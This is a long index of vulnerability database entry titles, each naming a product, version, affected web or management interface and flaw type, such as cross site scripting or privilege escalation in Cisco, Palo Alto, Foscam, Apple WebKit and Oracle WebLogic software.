[110077] Cisco UCS Central Software Web-based Management Interface cross site scripting
[110076] Cisco UCS Central Software Web-based Management Interface cross site scripting
[108906] Cisco WebEx Meetings Server Web Interface cross site scripting
[108556] Axigen Mail Server up to 8.x Webmail Interface actions.hsp cross site scripting
[108276] Cisco WebEx Meeting Center Web Interface cross site scripting
[108275] Cisco WebEx Meetings Server Web Interface cross site scripting
[108267] Cisco IOS XE Web Interface cross site scripting
[108090] Oracle iPlanet Web Server 7 Admin Graphical User Interface privilege escalation
[107491] Cisco ASA Web-based Management Interface cross site scripting
[107490] Cisco Meeting Server Web Admin Interface privilege escalation
[106219] Cisco FirePOWER Management Center Web-based Management Interface Reflected cross site scripting
[105423] Cisco WebEx Meetings Server 1.0.0.30/1.0.0.33/1.0.1.9/1.0.1.16 Web Interface information disclosure
[105421] Cisco Prime Infrastructure 3.2(0.0) Administrative Web Interface privilege escalation
[104946] Unitrends Backup up to 9.x API Storage Web Interface weak authentication
[104910] Cisco ASA 9.1(6.11)/9.4(1.2) Web-based Management Interface cross site scripting
[104909] Cisco ASA 9.5(1) Web-based Management Interface cross site scripting
[104900] Cisco ASA 9.3(3)/9.6(2) Web Interface User information disclosure
[104381] Palo Alto PAN-OS up to 6.1.17/7.0.15/7.1.10/8.0.2 Management Web Interface cross site scripting
[104326] Cisco Web Security Appliance Web Interface privilege escalation
[103732] Anti-virus Kaspersky Anti-virus up to 8.0.4. Web Interface action information disclosure
[103730] Kaspersky Anti-Virus up to 8.0.4 on Linux Web Interface 7PK Security Features
[103396] Cisco Identity Services Engine 1.3(0.909)/2.1(0.800) Web-based Management Interface cross site scripting
[103348] D-Link DIR-615 up to 20.12 Web Interface Form2File.htm cross site request forgery
[103014] Cisco Identity Services Engine 2.1(102.101) Web Application Interface Stored cross site scripting
[103013] Cisco Prime Infrastructure/Programmable Network Manager 2.0(4.0.45B)/3.1(1) Web-based Management Interface DOM-based cross site scripting
[103012] Cisco Prime Infrastructure/Programmable Network Manager 2.0(4.0.45B)/3.1(1) Web-based Management Interface Reflected cross site scripting
[103010] Cisco Identity Services Engine 2.1(0.800) Web-based Management Interface Reflected cross site scripting
[102926] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface memory corruption
[102925] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface pureftpd.passwd privilege escalation
[102924] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation
[102923] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation
[102922] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation
[102921] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation
[102920] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation
[102919] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation
[102865] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation
[102864] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation
[102863] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation
[102721] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface memory corruption
[102720] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface memory corruption
[102719] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface directory traversal
[102718] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation
[102717] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface privilege escalation
[102716] Foscam C1 Indoor HD Camera Web Management Interface memory corruption
[102277] Cisco Prime Collaboration Assurance 11.5(0)/11.6 Web-based Management Interface cross site request forgery
[101865] Juniper Junos Space up to 16.1 Administrative Web Interface privilege escalation
[101864] Juniper Junos Space up to 16.1 Administrative Web Interface privilege escalation
[101565] Cisco Unified Communications Manager up to 10.5 Web-based Management Interface cross site scripting
[101474] Cisco Prime Collaboration Provisioning up to 12.0 Web Interface privilege escalation
[101473] Cisco Prime Collaboration Provisioning up to 10.6 Web Interface information disclosure
[101440] McAfee Network Data Loss Prevention 9.3.x Web Interface Username information disclosure
[100804] Palo Alto PAN-OS up to 7.1.8 Management Web Interface information disclosure
[100719] Palo Alto PAN-OS up to 6.1.16/7.0.14/7.1.8 Management Web Interface information disclosure
[99763] Palo Alto PAN-OS up to 7.1.8 Management Web Interface privilege escalation
[99761] Palo Alto PAN-OS up to 7.0.13/7.1.8 Web Interface privilege escalation
[99431] Cisco Unified Communications Manager 12.0(0.98000.452) Web-based Management Interface Reflected cross site scripting
[99429] Cisco Unified Communications Manager Manager Web Interface sql injection
[99427] Cisco Prime Infrastructure/Evolved Programmable Network up to 3.2(0.0) Web Interface information disclosure
[99357] Cisco Wireless LAN Controller 8.3.102.0 Web Management Interface privilege escalation
[98298] Juniper Junos Space up to 15.2 Web Interface weak authentication
[98254] Cisco UCS Director 6.0(0.0) Web-based Management Interface cross site scripting
[97333] Palo Alto PAN-OS up to 6.1.15/7.0.17/7.1.7 Management Web Interface Persistent cross site scripting
[97332] Palo Alto PAN-OS up to 6.1.15/7.0.17/7.1.7 Management Web Interface File information disclosure
[97201] Cisco Prime Collaboration Assurance up to 11.0/11.1/11.5 Web Management Interface cross site scripting
[97198] Cisco Secure Access Control System 5.8(2.5) Web Interface information disclosure
[97197] Cisco Secure Access Control System 5.8(2.5) Web Interface Redirect
[97196] Cisco Secure Access Control System 5.8(2.5) Web User Interface privilege escalation
[97195] Cisco Secure Access Control System 5.8(2.5) Web Interface DOM cross site scripting
[97194] Cisco Meeting Server up to 2.1.1 Web Bridge Interface privilege escalation
[97189] Cisco Unified Communications Manager 12.0(0.98000.280) Web Management Interface cross site scripting
[97188] Cisco Unified Communications Manager 11.0(1.10000.10)/11.5(1.10000.69) Web Management Interface cross site scripting
[96245] Sophos Web Appliance Remote/Secure Web Gateway Server up to 4.2.1.3 Web Admin Interface MgrDiagnosticTools.php exec privilege escalation
[95999] Cisco IOS/IOx on IR829/IR809/IE4K/CGR1K Web-based Management Interface information disclosure
[93741] Siemens SIMATIC S7-400 Web Interface cross site request forgery
[93677] Palo Alto PAN-OS up to <=5.0.19 Management Web Interface memory corruption
[93300] Cisco Hosted Collaboration Mediation Fulfillment 11.5(1) Web Interface cross site request forgery
[93040] Puppet Enterprise Web Interface User information disclosure
[93039] Puppet Enterprise Web Interface Redirect
[91512] Cisco Hosted Collaboration Mediation Fulfillment up to 10.6(3) Web Interface directory traversal
[90588] Cisco X8.5.2 Administrative Web Interface privilege escalation
[90585] Cisco RV180/RV180W Web Interface directory traversal
[89556] U.S.Robotics Router 1.04 08 Web Interface /menu.htm weak encryption
[89467] Cisco WebEx Meetings Server 2.6 Admin Interface cross site scripting
[89443] Cisco IOS Web Interface privilege escalation
[89436] Netgear MR814 Web Interface information disclosure
[89435] Netgear WGR614 Web Interface information disclosure
[89222] Netscape Enterprise Web Server Administrative Interface weak authentication
[89192] IBM Tivoli Directory Server 4.1 Web Interface cross site scripting
[88817] Cisco Prime Infrastructure up to 3.1.0 Admin Web Interface privilege escalation
[88746] EMC Avamar up to 7.1.2/7.2.1 Web-Restore Interface privilege escalation
[88725] Sambar Server Pro 5.2/5.3/6.0 b1 Webmail Interface Credentials weak encryption
[88432] Netgear ProSafe VPN Firewall 1.0/1.1/1.2/1.3 Web Interface denial of service
[88039] Cisco RV110W/RV130W/RV215W Web Management Interface memory corruption
[88038] Cisco RV110W/RV130W/RV215W Web Management Interface cross site scripting
[88037] Cisco RV110W/RV130W/RV215W Web Management Interface privilege escalation
[87643] Cisco FirePOWER Management Center up to 6.0.0.1 Web Interface privilege escalation
[87621] Cisco Prime Infrastructure up to 3.0 API Web Interface privilege escalation
[82449] Juniper ScreenOS up to 6.3.0r20 Administrative Web Service Interface privilege escalation
[82277] Palo Alto PAN-OS up to 5.0.17/5.1.10/6.0.12/6.1.9/7.0.2H1 Management Web Interface privilege escalation
[81878] Fortinet FortiOS Web User Interface cross site scripting
[81779] Trend Micro OfficeScan up to 3.51 Web Interface privilege escalation
[81012] Citrix Netscaler Application Delivery Controller up to 10.5 Administrative Web Interface 7PK Security Features
[80701] Cisco RV220W Web-based Management Interface sql injection
[92714] Palo Alto PAN-OS 5.0.x/5.1.12/6.0.x/6.1.x Web Interface denial of service
[79293] Cisco Firepower Extensible Operating System 1.1(1.160) on Firepower 9000 Web Interface privilege escalation
[79255] Cisco Firepower Extensible Operating System 1.1(1.160) Web Interface privilege escalation
[79015] Cisco Unified Computing System 2.2(5b)A on Blade Web Interface information disclosure
[78906] Cisco Secure Access Control Server 5.7(0.15) Web Interface cross site scripting
[78905] Cisco Secure Access Control Server 5.7(0.15) Web Interface cross site scripting
[77760] Symantec Web Gateway 5.2.2 Interface privilege escalation
[77355] Cisco TelePresence Video Communication Server X8.5.1 Web Interface privilege escalation
[76654] Cisco Identity Services Engine 1.1(4.1)/1.3(106.146)/1.3(120.135) Web Interface privilege escalation
[76301] OpenEMR up to 4.2.0 Web Interface weak authentication
[75997] Cisco WebEx Meeting Center Web Admin Interface User information disclosure
[75621] Cisco Unified MeetingPlace 8.6(1.9) Web User Interface information disclosure
[75409] Cisco Wireless LAN Controller up to 7.0.241/7.4.122/7.6.120 Web Administration Interface privilege escalation
[75207] Cisco Unified Communications Manager 11.0(0.98000.225) Administrative Web Interface sql injection
[74417] SCADA Engine BACnet OPC up to 2.1.359.21 Web Interface BACnOPCServer.exe privilege escalation
[74416] SCADA Engine BACnet OPC up to 2.1.359.21 Web Interface memory corruption
[74168] Cisco Prime Infrastructure up to 2.1 Web Interface privilege escalation
[72751] Cisco Unified Communications Manager Administrative Web Interface sql injection
[71776] IBM Security Access Manager For Web 8.0 up to 8.0.0.1 Management Interface cross site scripting
[70828] oVirt up to 3.4.0 Web Admin Interface unknown vulnerability
[70382] Cisco Unified Communications Domain Manager up to 8.1 Admin Web Interface Redirect
[66838] Siemens Ruggedcom Rugged Operating System up to 3.5.3 Web Management Interface privilege escalation
[66262] Media5 Mediatrix Voip Gateway 4402 up to Dgw 1.1.13.186 Web Management Interface cross site scripting
[66214] Open-Xchange AppSuite up to 7.4.1 WebDAV Interface directory traversal
[65258] Cisco Unified Communications Manager Administrative Web Interface directory traversal
[65053] Cisco Video Surveillance Operations Manager Administrative Web Interface weak authentication
[64981] Cisco Unified Computing System Administrative Web Interface memory corruption
[63281] Cerberus FTP Server up to 2.41 Administrative Web Interface cross site scripting
[61250] Cisco Telepresence System Tx9000 1.7.4 Administrative Web Interface privilege escalation
[56617] Cisco TelePresence Multipoint Switch 1.0.x Administrative Web Interface privilege escalation
[56615] Cisco TelePresence Multipoint Switch 1.6.x Administrative Web Interface memory corruption
[54763] Gecad AXIGEN Mail Server up to 7.3 Webmail Interface cross site scripting
[51896] Accellion Secure File Transfer Appliance Administrative Web Interface privilege escalation
[49906] ZyXEL P-330W router Web Management Interface cross site request forgery
[49905] ZyXEL P-330W router Web Management Interface cross site scripting
[49192] Cisco 4200 Wireless Lan Controller up to 5.0 Administrative Web Interface denial of service
[48796] Netgear DG632 -/3.4.0 Ap Administrative Web Interface directory traversal
[48795] Netgear DG632 3.4.0 Ap Administrative Web Interface weak authentication
[48794] Netgear DG632 3.4.0 Ap Administrative Web Interface privilege escalation
[48468] Citrix Web Interface 5.0 privilege escalation
[46484] Netgear WGR614 V8/V9 Web Management Interface privilege escalation
[46359] Rockwell Automation Controllogix 1756-ENBT/A Ethernet/IP Bridge Web Interface Internal information disclosure
[41693] F5 BIG-IP 9.4.3 Web Management Interface cross site scripting
[41405] Snom 320 SIP Phone Web Interface cross site request forgery
[40527] F5 BIG-IP 9.4.3 Web Management Interface list_system.jsp search cross site scripting
[39897] Citrix NetScaler 8.0 Web Management Interface information disclosure
[39896] Citrix NetScaler 8.0 Web Management Interface weak encryption
[38923] IceWarp Merak Mail Server up to 8.9.1 Webmail Interface cross site scripting
[38451] Cisco WebEx Meetings Server 1.5 XML Programmatic Interface information disclosure
[35113] JBoss JBoss Application Server Web Management Interface privilege escalation
[34691] Symantec Web Security up to 3.0.1.84 License Registering Interface denial of service
[29894] Asterisk@Home up to 2.7 Web Interface misc/audio.php directory traversal
[24948] Argosoft Mail Server 1.8.7.6 Web Interface cross site scripting
[24947] Argosoft Mail Server 1.8.7.6 Webmail Interface cross site scripting
[23539] Mantis up to 0.10.1 Web Interface information disclosure
[22901] Edimax Full Rate ADSL Router AR-6004 Web Management Interface weak authentication
[22900] Edimax Full Rate ADSL Router AR-6004 Web Management Interface cross site scripting
[22532] Netgear VPN Router FVS318 Web Admin Interface denial of service
[21810] Business Objects Crystal Reports 9 Web Interface Disk Exhaustion denial of service
[21346] Netgear FM114P 1.4 Beta Release 17 Web Configuration Interface netgear.cfg directory traversal
[21286] Aprelium Abyss Web Server up to 1.1.2 Remote Web Management Interface weak authentication
[20464] Best Practical Solutions Request Tracker up to 1.0.7 Web Interface cross site scripting
[19987] Oracle Application Server 9.0.2 Web Cache Administration Interface Password privilege escalation
[19318] Webmin up to 0.92.1 Web Interface cross site scripting
[18829] Juniper Netscreen ScreenOS up to 2.6.1/3.0.3 Web Interface denial of service
[18381] Oracle9i 9.0/9.0.1 Web Administration Interface privilege escalation
[17704] Lotus Domino up to 5.0.8 Web Administration Interface webadmin.ntf privilege escalation
[17547] Internet Software Solutions Air Messenger LAN Server 3.4.2 Webpaging Interface directory traversal
[17487] Ipswitch IMail 6.0.2/6.0.6/7.0.4 Webmail Interface printmail.cgi memory corruption
[16870] Cisco Aironet 340 up to 8.55 Web Interface privilege escalation
[15630] Computalynx CMail 2.4.7 Web Interface memory corruption
[15629] Computalynx CMail 2.4.7 Web Interface memory corruption
[14917] Zeus Technologies Zeus Web Server 3.3.1/3.3.2 Administration Interface weak encryption
[13179] Netgear DGN2200 1.0.0.29_1.7.29_hots Web Admin Interface /password.cgi cross site request forgery
[13150] Netgear DGN2200 1.0.0.29_1.7.29_hots Web Interface Stored cross site scripting
[12617] D-Link DIR-600 2.16ww Web Admin Interface cross site request forgery
[12466] Barracuda Firewall 6.1.0.016 Web Interface cross site scripting
[12328] Netgear DGN2200 N300 up to 1.0.0.36-7.0.37 Web Interface ping.cgi privilege escalation
[12324] Netgear D6300B up to V1.0.0.14_1.0.14 Web Interface diag.cgi privilege escalation
[12212] Open-Xchange AppSuite up to 7.4.0 Web Interface cross site scripting
[12146] Cisco Secure Access Control System 5.1 Web Interface Authentication Bypass privilege escalation
[12035] Red Hat JBoss Web Framework Kit 2.3.0 XML External Entity InterfaceGenerator.java information disclosure
[12034] Red Hat JBoss Web Framework Kit 2.3.0 Seam Remoting InterfaceGenerator InterfaceGenerator.java privilege escalation
[11781] QNAP QTS 4.0/4.0.3 Web Interface cgi-bin/jc.cgi directory traversal
[11327] Palo Alto PAN-OS 5.0.8 Firewall Web Interface Stored cross site scripting
[10255] Synology DiskStation Manager 4.3-3776 Web Interface /webman/info.cgi Reflected cross site scripting
[10254] Synology DiskStation Manager 4.3-3776 Web Interface /scripts/uistrings.cgi privilege escalation
[9555] Cisco Identity Services Engine up to 1.3(0.320) Web Interface cross site request forgery
[9528] Cisco Linksys WRT110 Web Interface cross site request forgery
[8749] Cisco Secure Access Control System Web Interface weak authentication
[8637] OpenVPN 1.8.4 Admin Web Interface cross site request forgery
[8540] Cisco Unified Computing System up to 1.4(x)/2.0(1m) Manager Web Interface information disclosure
[8460] Belkin N300/N900 Wireless Router 1.00.06/1.00.23 Web Interface util_system.html cross site request forgery
[8459] TP-LINK TL-WR1043ND V1_120405 FTP Web Interface denial of service
[6297] Novell GroupWise up to 2012 Web Admin Interface gwia.exe Numeric Error
[5590] Red Hat Jboss Enterprise Web/Application Platforms up to 5.1.2 on Linux Java Naming/Directory Interface Service privilege escalation
[4646] Citrix XenServer up to 1.1.1 Web Self Service Management Interface unknown vulnerability
[4256] Linksys WRT54GC 1.02.5/1.02.8/1.05.7 Web Management Interface memory corruption
[4222] Citrix Web Interface 5.x cross site scripting
[3963] Citrix Web Interface up to 5.0.1 cross site scripting
[3519] Citrix Web Interface cross site scripting
[2977] Cisco CallManager up to 4.1 Web Interface /CCMAdmin/serverlist.asp cross site scripting
[2876] Symantec Web Security up to 3.0.1.85 License Registering Interface denial of service
[738] ZyXEL Prestige Router 650HW-31/650R-11 Web Interface Password memory corruption
[177010] GitLab 10.5 Webhook server-side request forgery
[176953] Schneider Electric Modicon X80 BMXNOR0200H RTU up to SV1.70 IR22 Web Server information disclosure
[176919] Advantech WebAccess 8.4.2/8.4.4 bwRoot.asp WADashboard cross site scripting
[176860] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 SAML Web Inbound Trust Association Interceptor access control
[176830] Backdoor.Win32.Zombam.gen HTML Web UI cross site scripting
[176829] Backdoor.Win32.Zombam.gen HTML Web UI buffer overflow
[176828] Backdoor.Win32.Zombam.gen HTML Web UI command injection
[176804] Grant Averett Cerberus FTP Server up to 10.0.18/11.0.3 Web Client cross site scripting
[176800] TP-Link TL-SG2005/TL-SG2008 1.0.0 Build 20180529 Rel.40524 Device Description Interface array index
[176634] SAP NetWeaver Application Server ABAP 702/731/750/753/755 Web Dynpro ABAP cross site scripting
[176632] SAP NetWeaver AS for ABAP 702 up to <=700 Web Survey cross site scripting
[176554] GitLab Community Edition/Enterprise Edition 10.5 Webhook server-side request forgery
[176534] Squid Web Proxy up to 4.14/5.0.5 HTTP Range Request denial of service
[176406] IBM WebSphere Application Server 8.5/9.0 Network Deployment path traversal
[176350] Cisco WebEx Player on Windows/macOS WRF File memory corruption
[176349] Cisco WebEx Player on Windows/macOS WRF File memory corruption
[176348] Cisco WebEx Network Recording Player/WebEx Player ARF/WRF File memory corruption
[176345] Cisco WebEx Network Recording Player/WebEx Player ARF/WRF File memory corruption
[176341] Cisco WebEx Meetings/WebEx Meetings Server Web UI redirect
[176340] Cisco WebEx Meetings Server Multimedia Viewer protection mechanism
[176272] IBM Jazz Foundation/Engineering Web UI cross site scripting
[176271] IBM Jazz Foundation/Engineering Web UI cross site scripting
[176270] IBM Jazz Foundation/Engineering Web UI cross site scripting
[176269] IBM Jazz Foundation/Engineering Web UI cross site scripting
[176132] IBM Cognos Analytics 11.0/11.1 Web UI cross site scripting
[176128] IBM Cognos Analytics 11.0/11.1 Web UI cross site scripting
[176067] Ettercap 0.7.3 GTK Interface ec_gtk_conf.c gtkui_conf_read stack-based overflow
[176064] Squid Web Proxy up to 4.14/5.0.5 HTTP Response denial of service
[176034] OpenShift 3 Web Console security check for standard
[176004] Checkbox Survey up to 6 CheckboxWeb.dll deserialization
[175986] Squid Web Proxy up to 4.14/5.0.5 urn Scheme memory allocation
[175984] Squid Web Proxy up to 4.14/5.0.5 Response Header denial of service
[175983] Squid Web Proxy up to 4.14/5.0.5 Cache Manager API memory leak
[175968] Squid Web Proxy up to 4.14/5.0.5 Range Request denial of service
[175964] Squid Web Proxy up to 4.14/5.0.5 Range Request denial of service
[175878] IBM WebSphere Application Server 8.0/8.5/9.0 XML Data xml external entity reference
[175769] Apple macOS up to 11.3 WebRTC null pointer dereference
[175768] Apple macOS up to 11.3 WebRTC null pointer dereference
[175767] Apple macOS up to 11.3 WebKit unknown vulnerability
[175766] Apple macOS up to 11.3 WebKit memory corruption
[175765] Apple macOS up to 11.3 WebKit memory corruption
[175764] Apple macOS up to 11.3 WebKit cross site scripting
[175763] Apple macOS up to 11.3 WebKit information disclosure
[175762] Apple macOS up to 11.3 WebKit use after free
[175761] Apple macOS up to 11.3 WebKit cross site scripting
[175696] Apple tvOS up to 14.5 WebKit integer overflow
[175695] Apple tvOS up to 14.5 WebKit unknown vulnerability
[175694] Apple tvOS up to 14.5 WebKit memory corruption
[175693] Apple tvOS up to 14.5 WebKit memory corruption
[175692] Apple tvOS up to 14.5 WebKit cross site scripting
[175691] Apple tvOS up to 14.5 WebKit information disclosure
[175690] Apple tvOS up to 14.5 WebKit use after free
[175689] Apple tvOS up to 14.5 WebKit cross site scripting
[175688] Apple tvOS up to 14.5 WebKit memory corruption
[175670] Apple watchOS up to 7.4.1 WebKit unknown vulnerability
[175669] Apple watchOS up to 7.4.1 WebKit memory corruption
[175668] Apple watchOS up to 7.4.1 WebKit memory corruption
[175667] Apple watchOS up to 7.4.1 WebKit cross site scripting
[175665] Apple watchOS up to 7.4.1 WebKit use after free
[175664] Apple watchOS up to 7.4.1 WebKit cross site scripting
[175573] IBM Security Guardium 11.2 Web UI cross site scripting
[175372] IBM Maximo Asset Management 7.6.0/7.6.1 Web UI cross site scripting
[175234] Moxa NPort IA5150A-IEX up to 1.4 Web Console unknown vulnerability
[175149] 10Web Mobile-Friendly Image Gallery Plugin up to 1.5.68 on WordPress AJAX Action gallery_id cross site scripting
[175106] IBM QRadar User Behavior Analytics up to 4.0.1 Web UI cross site scripting
[174820] Microsoft Accessibility Insights for Web information disclosure
[174791] F5 BIG-IP ASM up to 12.1.5.2/13.1.3.4/14.1.3.0/15.1.1/16.0.1.0 WebSocket Request denial of service
[174784] EC-CUBE 4.0.0 up to 4.0.5 EC Web Site cross site scripting
[174765] IBM Cloud Pak for Security 1.5.0.0/1.5.0.1 Web UI cross site scripting
[174615] IBM Tivoli Storage Manager 5 Release 2 Command Line Administrative Interface dsmadmc.exe buffer overflow
[174568] Cisco SD-WAN vManage Software Cluster Management Interface information disclosure
[174515] Apple macOS up to 11.3.0 WebKit integer overflow
[174514] Apple macOS up to 11.3.0 WebKit memory corruption
[174513] Apple watchOS up to 7.4.0 WebKit memory corruption
[174465] IBM QRadar SIEM 7.3/7.4 Web UI cross site scripting
[174463] IBM QRadar SIEM 7.3/7.4 Web UI cross site scripting
[174324] Cisco Firepower Device Manager Web-based Management resource consumption
[174159] IBM Spectrum Scale up to 5.0.5.6/5.1.0.2 Web UI cross site scripting
[174130] Advantech WebAccess/SCADA up to 9.0.1 Portal permission assignment
[174101] Apple watchOS up to 7.3.3 WebKit Storage use after free
[174100] Apple watchOS up to 7.3.3 WebKit initialization
[174099] Apple watchOS up to 7.3.3 WebKit cross site scripting
[174098] Apple watchOS up to 7.3.3 WebKit memory corruption
[174097] Apple watchOS up to 7.3.3 WebKit cross site scripting
[174063] Apple tvOS up to 14.4 WebKit Storage use after free
[174062] Apple tvOS up to 14.4 WebKit initialization
[174061] Apple tvOS up to 14.4 WebKit cross site scripting
[174060] Apple tvOS up to 14.4 WebKit memory corruption
[174059] Apple tvOS up to 14.4 WebKit cross site scripting
[174058] Apple tvOS up to 14.4 WebKit memory corruption
[174024] Apple macOS up to 11.2.3 WebRTC use after free
[174023] Apple macOS up to 11.2.3 WebKit Storage use after free
[174022] Apple macOS up to 11.2.3 WebKit initialization
[174021] Apple macOS up to 11.2.3 WebKit cross site scripting
[174020] Apple macOS up to 11.2.3 WebKit memory corruption
[174019] Apple macOS up to 11.2.3 WebKit cross site scripting
[173872] Webmin 1.973 User cross-site request forgery
[173871] Webmin 1.973 Process cross site scripting
[173870] Webmin 1.973 Process cross-site request forgery
[173769] Juniper Junos OS J-Web cross site scripting
[173766] Juniper Junos OS J-Web input validation
[173761] Juniper Junos OS Web Service allocation of resources
[173749] Juniper Junos OS on SRX/vSRX J-web path traversal
[173734] Juniper Junos OS IRB Interface memory leak
[173623] Oracle PeopleSoft Enterprise PT PeopleTools 8.56/8.57/8.58 Weblogic cross site scripting
[173616] Oracle PeopleSoft Enterprise PT PeopleTools 8.56/8.57/8.58 Weblogic deserialization
[173559] Oracle JD Edwards EnterpriseOne Tools up to 9.2.4.x Web Runtime cross site scripting
[173558] Oracle JD Edwards EnterpriseOne Tools up to 9.2.5.1 Web Runtime cross site scripting
[173553] Oracle JD Edwards EnterpriseOne Tools up to 9.2.3.x Web Runtime server-side request forgery
[173534] Oracle Business Intelligence Enterprise Edition 5.5.0.0.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Analytics Web General unknown vulnerability
[173533] Oracle WebLogic Server Console information disclosure
[173532] Oracle WebLogic Server Core information disclosure
[173531] Oracle HTTP Server 11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Web Listener unknown vulnerability
[173526] Oracle WebLogic Server 10.3.6.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Web Services information disclosure
[173525] Oracle WebLogic Server 10.3.6.0.0 Console unknown vulnerability
[173521] Oracle WebLogic Server Core unknown vulnerability
[173520] Oracle WebLogic Server 10.3.6.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Core information disclosure
[173519] Oracle WebLogic Server 10.3.6.0.0 Core deserialization
[173515] Oracle WebLogic Server Proxy Plug-In 11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 SSL Module denial of service
[173514] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 TopLink Integration information disclosure
[173513] Oracle WebCenter Portal 12.2.1.3.0/12.2.1.4.0 Security Framework denial of service
[173495] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Coherence Container unknown vulnerability
[173494] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0/12.2.1.4.0/14.1.1.0.0 Core unknown vulnerability
[173493] Oracle WebCenter Portal 12.2.1.3.0/12.2.1.4.0 Security Framework resource consumption
[173465] Oracle Application Testing Suite 13.3.0.1 Load Testing for Web Apps buffer overflow
[173444] Oracle Projects 12.1.1 up to 12.2.10 User Interface unknown vulnerability
[173300] Wikimedia analytics-quarry-web Content Type app.py cross site scripting
[173243] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 XML Data xml external entity reference
[173237] IBM WebSphere Application Server 8.0/8.5/9.0 XML Data xml external entity reference
[172836] ZEROF Web Server 1.0 Login Page /HandleEvent sql injection
[172810] Papoo CMS Light/CMS Pro Admin Interface cross-site request forgery
[172681] Aprelium Abyss Web Server 2.12.1/2.14 HTTP Request out-of-bounds read
[172671] Forcepoint Web Security Content Gateway up to 8.5.3 XML information disclosure
[172660] Web-School ERP up to 5.0 Voucher Payment create cross-site request forgery
[172659] Web-School ERP 5.0 Event cross site scripting
[172658] Web-School ERP up to 5.0 create student_leave_application cross-site request forgery
[172657] Web-School ERP 5.0 Event injection
[172654] IBM WebSphere Application Server 7.0/8.0/8.5 server-side request forgery
[172639] Cisco Webex Meetings Client on Android Avatar access control
[172636] Cisco Webex Meetings cross site scripting
[172452] Elementor Website Builder Plugin up to 3.1.3 on WordPress image-box.php cross site scripting
[172451] Elementor Website Builder Plugin up to 3.1.3 on WordPress icon-box.php cross site scripting
[172450] Elementor Website Builder Plugin up to 3.1.3 on WordPress Saved Pages accordion.php cross site scripting
[172449] Elementor Website Builder Plugin up to 3.1.3 on WordPress Saved Pages divider.php cross site scripting
[172448] Elementor Website Builder Plugin up to 3.1.3 on WordPress Saved Pages heading.php cross site scripting
[172447] Elementor Website Builder Plugin up to 3.1.3 on WordPress column.php cross site scripting
[172404] IBM InfoSphere Information Server 11.7 Web UI cross site scripting
[172375] Apple tvOS WebKit access control
[172374] Apple watchOS WebKit access control
[172371] Apple tvOS WebRTC redirect
[172370] Apple watchOS WebRTC redirect
[172353] Apple tvOS WebKit type confusion
[172352] Apple watchOS WebKit type confusion
[172350] Apple watchOS WebKit use after free
[172349] Apple tvOS WebKit use after free
[172138] Linux Kernel up to 5.11.2 Webcam v4l2-ioctl.c video_usercopy memory leak
[172114] VMware Carbon Black Cloud Workload Appliance 1.0.0/1.01 Administrative Interface information disclosure
[172014] IBM Jazz Foundation Web UI cross site scripting
[172013] IBM Jazz Foundation Web UI cross site scripting
[172012] IBM Jazz Foundation Web UI cross site scripting
[172011] IBM Jazz Foundation Web UI cross site scripting
[172008] IBM Jazz Foundation Web UI cross site scripting
[172007] IBM Jazz Foundation Web UI cross site scripting
[171954] INSMA Wifi Mini Spy 1080P HD Security IP Camera 1.9.7 B WebUI cross-site request forgery
[171908] Acexy Wireless-N WiFi Repeater 28.08.06.1 Web Management Administrator Password password recovery
[171904] Apple watchOS up to 7.3.2 WebKit cross site scripting
[171715] Cisco IOS XE Web UI command injection
[171709] Cisco IOS XE Web UI path traversal
[171700] Cisco IOS XE Websocket insufficient verification of data authenticity
[171683] Cisco IOS XE Web UI denial of service
[171680] Cisco IOS XE Web UI denial of service
[171468] Squid Web Proxy up to 4.13/5.0.4 Config Setting uri_whitespace request smuggling
[171457] Advantech WebAccess/SCADA up to 9.0 cross site scripting
[171415] 10Web Photo Gallery Plugin model.php sql injection
[171408] Slider by 10Web Plugin up to 1.2.35 on WordPress bulk_action/export_full/save_slider_db sql injection
[171284] Moodle up to 3.5.16/3.8.7/3.9.4/3.10.1 Web Service authorization
[171262] Barracuda Web Application Firewall Online Demo Certificate FFM-SSLspect denial of service
[171208] Synology DiskStation Manager Web Request iscsi_snapshot_comm_core out-of-bounds read
[171207] Synology DiskStation Manager Web Request iscsi_snapshot_comm_core use after free
[171205] Barracuda Web Application Firewall Online Demo /cgi-mod/lookup.cgi ldap injection
[171203] Apple macOS up to 11.2.2 WebKit memory corruption
[171202] Apple watchOS up to 7.3.1 WebKit memory corruption
[171148] IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 Web UI cross site scripting
[171071] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 JAX-RPC Application path traversal
[171065] Netgear JGS516PE/GS116Ev2 2.6.0.43 Web Administration Panel integer overflow
[171063] Netgear JGS516PE/GS116Ev2 2.6.0.43 Administration Web Panel cross site scripting
[171062] Netgear JGS516PE/GS116Ev2 2.6.0.43 Administration Web Panel buffer overflow
[171058] Netgear JGS516PE/GS116Ev2 2.6.0.43 Web Administration Panel cross-site request forgery
[171030] ExpressVPN Router 1 Nginx Webserver integer overflow
